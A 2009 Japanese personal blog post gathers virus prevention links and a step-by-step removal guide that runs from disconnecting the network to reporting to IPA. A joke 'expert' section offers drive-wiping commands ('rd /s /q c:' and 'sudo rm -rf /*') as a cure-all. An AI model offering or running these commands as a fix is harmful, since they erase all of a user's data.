忍者ブログ
MASTER →  ADMIN / NEW ENTRY / COMMENT
現代魔法(nearly equal 情報技術)を勉強中な人のメモ(チラシの裏)
/ 2017/12/12 (Tue) / 編集
×

[PR]上記の広告は3ヶ月以上新規記事投稿のないブログに表示されています。新しい記事を書く事で広告が消えます。

/ 2009/05/12 (Tue) / 編集
ウィルスとその対応についてのまとめ、今後も感染するたびに追記予定

感染しないようにするための「対策編」と感染後についての「対応(駆除)編」にわけて順次まとめてみる予定
といってもほぼ自分用リンク集(笑)

対策編

まずはウィルスについて知る事、少なくとも上2つは読んでね

作る人

少なくとも[IPA]セキュア・プログラミング講座

使う人

対応(駆除)編

実際に感染(?)したことのあるもの

ウィルス駆除方法(導入編)

  1. ネットワークから外す
  2. 二次感染をふせぐために、LANやモデムのケーブルをはずし、ネットワークから切断する。
  3. ウイルスを特定する
  4. ウィルス対策ソフト、もしくはgoogle先生に聞いてみる
  5. ウイルスを駆除する
  6. 上で調べた結果に基づき、ウィルスを駆除する
  7. システムを修復する
  8. コンピュータをウィルスに感染する前の状態に戻す(ロールバックする)、それようのソフトもある、大事なファイルの確保後にクリーンインストールもあり
  9. ウイルスチェックをする
  10. ウイルス対策ソフトを最新版に更新し、コンピュータ全体のウイルスチェックを行い、ウイルスが感染に駆除できたかどうかを確認
  11. ウイルス対策をする
  12. 今後のためにウィルス対策
  13. IPAへ報告をする
  14. 情報処理推進機構 セキュリティセンター(IPA ISEC)に通報する、ウィルス感染時の相談も受けているらしい
よくわからない人は(1)の後にIPA(03-5978-7509)やウィルス対策ソフトのメーカーに電話で電話で問い合わせるのもよし、とりあえず1だけは確実に!!

ウィルス駆除方法(玄人編)

ウィルスを手動で駆除したい時に使うかもしれない情報

最終手段

玄人向け
どんなウィルスもいちころさ!ウィルスへの八つ当たり用コマンド

for Windows

[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする

by ちょwwwwwwウイルスが検出されたwwwww
実行例

for Mac / Linux / Unix

sudo rm -rf /*

その後


 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |
       ____.____    | .__  いらないPCを
     |        |        |   | |\_\  窓から
     |        | ∧_∧ |   | |  |.◎.| 投げ捨てろ
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |   

拍手[0回]

PR
忍者ブログ [PR]